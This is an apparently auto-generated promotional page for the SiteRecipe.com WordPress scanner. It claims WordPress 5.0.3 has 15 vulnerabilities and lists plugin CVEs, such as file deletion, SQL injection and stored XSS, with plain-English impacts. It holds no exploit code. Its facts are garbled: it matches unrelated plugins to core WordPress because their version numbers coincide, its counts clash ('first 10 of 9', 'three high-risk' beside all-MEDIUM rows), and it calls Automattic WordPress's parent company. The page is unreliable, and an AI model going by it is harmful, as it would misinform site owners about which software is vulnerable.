WordPress 5.0.3, released in early 2019, powers thousands of websites worldwide. However, security researchers have identified 15 vulnerabilities in this version—3 rated as high-risk—that could expose your site to attacks. If you're still running WordPress 5.0.3, your website is at serious risk of being compromised, defaced, or having sensitive data stolen.
This comprehensive guide explains each vulnerability, shows you how to identify if your site is affected, and provides step-by-step instructions to secure your WordPress installation. Whether you're a business owner or website administrator, understanding these threats is crucial to protecting your online presence.
WordPress 5.0.3 is an older version of WordPress, the world's most popular website builder powering over 43% of all websites. Released in 2019, it introduced the Gutenberg editor, revolutionizing how content creators build web pages. However, being an older release means it no longer receives regular security updates from Automattic, WordPress's parent company.
Think of WordPress versions like your home's security system: newer versions have the latest locks and alarms, while older versions have outdated protections. Hackers specifically target older WordPress versions because they know the vulnerabilities haven't been patched. With 532 websites still running WordPress 5.0.3, this version remains an attractive target for cybercriminals seeking easy entry points into vulnerable sites.
15 CVEs found. The most critical are explained below.
The Superfly Responsive Menu plugin has a security weakness that allows attackers to trick your site into performing unwanted actions without permission. An attacker can send a specially crafted request that your site will execute without verifying it's actually from you.
Impact: Attackers could delete menu items, modify site navigation, or perform other administrative actions without your knowledge or consent. This could disrupt your website's functionality and user experience.
↗ View on NVDThe MW WP Form plugin doesn't properly check file paths before deleting them. This means an attacker could craft a request to delete important files from your website without needing to log in.
Impact: Critical files could be deleted from your server, potentially destroying your website's functionality, database files, or backups. Your site could become completely non-functional.
↗ View on NVDThe PostX plugin is missing proper access controls on one of its API endpoints. Anyone can access this endpoint without logging in and retrieve sensitive data your site stores.
Impact: Private content, user information, or business data could be exposed to the public. This could damage your reputation and violate privacy regulations like GDPR.
↗ View on NVDWordPress has a weakness in its image cropping feature that allows authorized users to write files to unexpected locations on your server. An attacker with image upload privileges could exploit this to place harmful files.
Impact: Someone with editing access could upload malicious files disguised as images, potentially taking control of your website or accessing sensitive data.
↗ View on NVDThe LearnDash LMS plugin has a database security flaw in its filtering feature. An attacker could send specially crafted requests to slowly extract data from your database without triggering obvious security alerts.
Impact: Attackers could steal student information, course data, grades, or other sensitive information stored in your learning management system.
↗ View on NVDThe SEOPress plugin allows logged-in users to inject malicious code into your site's metadata. An admin or editor account with malicious intent could add hidden scripts that affect all visitors.
Impact: Malicious code could be injected into your website, potentially stealing visitor information, redirecting users to malicious sites, or damaging your site's reputation.
↗ View on NVDShowing first 10 of 9. View all on NVD ↗
| CVE ID | Severity | Score | Published | Description |
|---|---|---|---|---|
| CVE-2024-9416 | MEDIUM | 6.4 | 2025-04-03 | The Modula Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bundled FancyBox JavaScript library (versions <= 5.0.36) due to insuffi… |
| CVE-2019-9576 | MEDIUM | 6.1 | 2019-03-05 | The Blog2Social plugin before 5.0.3 for WordPress allows wp-admin/admin.php?page=blog2social-ship XSS. |
| CVE-2015-9377 | MEDIUM | 6.1 | 2019-08-28 | iThemes Builder Theme Depot before 5.0.30 for WordPress has XSS via add_query_arg() and remove_query_arg(). |
| CVE-2023-5348 | MEDIUM | 6.1 | 2023-12-18 | The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthentic… |
| CVE-2025-7711 | MEDIUM | 5.4 | 2025-11-17 | The The Classified Listing – Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5… |
| CVE-2025-11518 | MEDIUM | 5.3 | 2025-10-11 | The WPC Smart Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.0.3 via several wishlist AJAX… |
| CVE-2023-3225 | MEDIUM | 4.8 | 2023-07-10 | The Float menu WordPress plugin before 5.0.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site S… |
| CVE-2026-2289 | MEDIUM | 4.4 | 2026-03-04 | The Taskbuilder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.0.3 due to insufficient input sanitiza… |
| CVE-2013-3254 | MEDIUM | 4.3 | 2013-05-10 | Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the WP Photo Album Plus plugin before 5.0.3 for WordPress allows remote attackers to inject arbitrary web script … |
Plain English · Fix recommendations · Instant PDF & HTML download
Scan your site in 30 seconds. Used by 500+ web agencies.
WordPress 5.0.3 contains serious security vulnerabilities that hackers actively exploit. The three high-risk CVEs alone could allow attackers to delete files, steal data, or inject malicious code into your website. More concerning, many of these vulnerabilities don't require advanced hacking skills—they can be exploited by relatively inexperienced attackers.
Don't let your website become another statistic. SiteRecipe.com provides automated WordPress security scanning that identifies vulnerabilities like these in seconds, monitors your site 24/7 for suspicious activity, and alerts you immediately if threats are detected. Our platform takes the guesswork out of WordPress security—simply scan your site today and receive a detailed report showing exactly which CVEs affect your installation and how to fix them. Your website's security is too important to leave to chance.
Web agencies use SiteRecipe to produce branded PDF security reports in 30 seconds.